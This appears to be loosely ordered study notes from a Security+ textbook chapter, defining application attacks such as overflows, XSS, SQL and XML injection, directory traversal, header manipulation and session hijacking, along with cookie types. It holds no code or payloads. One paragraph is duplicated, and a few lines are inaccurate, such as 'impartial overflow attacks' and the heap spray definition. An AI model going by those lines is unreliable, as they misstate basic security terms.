Chapter 3

Types of overflow attacks:

- Buffer overflow attacks - Integer overflow attacks - Arbitrary/remote code execution attacks

Cookies

- Cookies store user-specific information on user's local computer

Such common web application attacks are:

- Cross-site scripting - SQL injection - XML injection - Command injection/directory traversal

Header manipulation

- HTTP header contains fields that characterize data being transmitted - Headers can originate from a Web browser • Browsers do not normally allow this • Attacker's short program can allow modification

Buffer overflow attacks

- Occur when a process attempts to store data in RAM beyond the boundaries of a fixed-length storage buffer - Extra data overflows into adjacent memory locations • An attacker can overflow the buffer with a new address pointing to the attacker's malware code

- Locally shared object (LSO

- can store up to 100 KB of data form a website • More complex than the simple text found in a regular cookie • Also called a Flash cookie

First-party cookie

- cookie created by Web site user is currently viewing

Session cookie

- stored in RAM and expires when browser is closed

Arbitrary/Remote Code Execution

A heap spray is often used in an arbitrary/remote code execution attack • Inserts data only in parts of memory

• Malicious add-ons can be written by using Microsoft's Active X

ActiveX is a set of rules for how applications under the Microsoft Windows OS should share information • Attackers can take advantage of vulnerabilities in ActiveX to perform malicious attacks on a computer

In an integer overflow attack:

An attacker changes the value of a variable to something outside the range that the programmer had intended by using an integer overflow

• Integer Overflow Attack

An integer overflow is the condition that occurs when the result of an arithmetic operation exceeds the maximum size of the integer type used to store it

Attachments

Attachments - Files that are coupled with email messages - Malicious attachments are commonly used to spread viruses, Trojans, and other malware

Session Hijacking

Attacker attempts to impersonate user by stealing or guessing session token - Session token is a random string assigned to an interaction between user and web application • An attacker can attempt to obtain the session token: - By using XSS or other attacks to steal the session token cookie from the victim's computer - Eavesdropping on the transmission - Guessing the session token

• Security risks exist when using add-ons

Attackers can create malicious add-ons to launch attacks against the user's computer

• Impartial overflow attacks

Attacks designed to "overflow" areas of memory with instructions from the attacker

Application Attacks

Attacks on the applications in a networked computer system can be directed toward the server, the client, or both

Drive-by download

Client computer is compromised simply by viewing a Web page - Attackers inject content into vulnerable Web server • Gain access to server's operating system - Attackers craft a zero pixel Iframe (short for inline frame) to avoid visual detection - Embed an HTML document inside main document - Client's browser downloads malicious script - Instructs computer to download malware

Add-ons can do the following:

Create additional web browser toolbars - Change browser menus - Be aware of other tabs open in the same browser - Process the content of every webpage that is loaded

Cross-Site Scripting (XSS)

Injecting scripts into a Web application server to direct attacks at unsuspecting clients

• Malicious Add-ons

Plug-in - a third party library that attaches to a web browser and can be embedded inside a webpage - Add-ons or extensions - add functionality to the web browser

• Examples of HTTP header manipulation

Referrer - Accept-language - Response splitting

Server-Side Web Application Attacks

Securing server-side web applications of often considered more difficult than protecting other systems

SQL Injection

Targets SQL servers by injecting malicious commands into them • SQL (Structured Query Language) - Used to manipulate data stored in relational database • Forgotten password example: - Attacker enters incorrectly formatted e-mail address - Response lets attacker know whether input is being validated Targets SQL servers by injecting malicious commands into them • SQL (Structured Query Language) - Used to manipulate data stored in relational database • Forgotten password example: - Attacker enters incorrectly formatted e-mail address - Response lets attacker know whether input is being validated

Client-Side Application Attacks

Web application attacks are server-side attacks • Client-side attacks target vulnerabilities in client applications that interact with a compromised server or process malicious data • The client initiates connection with the server, which could result in an attack

Directory Traversal/ Command Injection

Web server users are typically restricted to the root directory • Users may be able to access subdirectories: - But not parallel or higher level directories • Directory traversal attack - Uses malformed input or takes advantage of software vulnerabilities - Attacker moves from root directory to restricted directories • Command injection attack - Attacker enters commands to execute on a server • A directory traversal attack can be launched through: - A vulnerability in the web application program that accepts user input - A vulnerability in the web server OS software - A security misconfiguration on the server

Zero-day attack

an attack that exploits previously unknown vulnerabilities, victims have not time to prepare for or defend against the attack

An arbitrary/remote code execution attack allows

an attacker to run programs and execute commands on a different computer - Gains control of the victim's computer to execute commands

• Traditional network security devices

can block traditional network attacks, but cannot always block web application attacks - Many network security devices ignore the content of HTTP traffic

Accept-language

field contents may be passed directly to an SQL database - Attacker could inject SQL command by modifying this header

referer field

indicates the site that generated the Web page - Attacker can modify this field to hide the fact it came from another site

Response splitting

is one of the most common HTTP header manipulation attacks

- Persistent cookie

recorded on computer's hard drive and does not expire when the browser closes • Also called a tracking cookie

Third-party cookie

site advertisers place a cookie to record user preferences

Many server-side web application attacks

target the input that the applications accept from users

What do cookies do?

• Cookies pose security and privacy risks - First-party cookies may be stolen and used to impersonate the user - Used to tailor advertising - Can be exploited by attackers

XML Injection

• Markup language - Method for adding annotations to text • HTML - Uses tags surrounded by brackets - Instructs browser to display text in specific format • XML - Carries data instead of indicating how to display it - No predefined set of tags • Users define their own tags CompTIA Security+ Guide to Network Security Fundamentals, Fifth Edition 13 © Cengage Learning 2015 XML Injection • XML injection attack - Similar to SQL injection attack - Attacker discovers a Web site that does not filter user data - Injects XML tags and data into the database • XPath injection - Specific type of XML injection attack - Attempts to exploit XML Path Language queries that are built from user input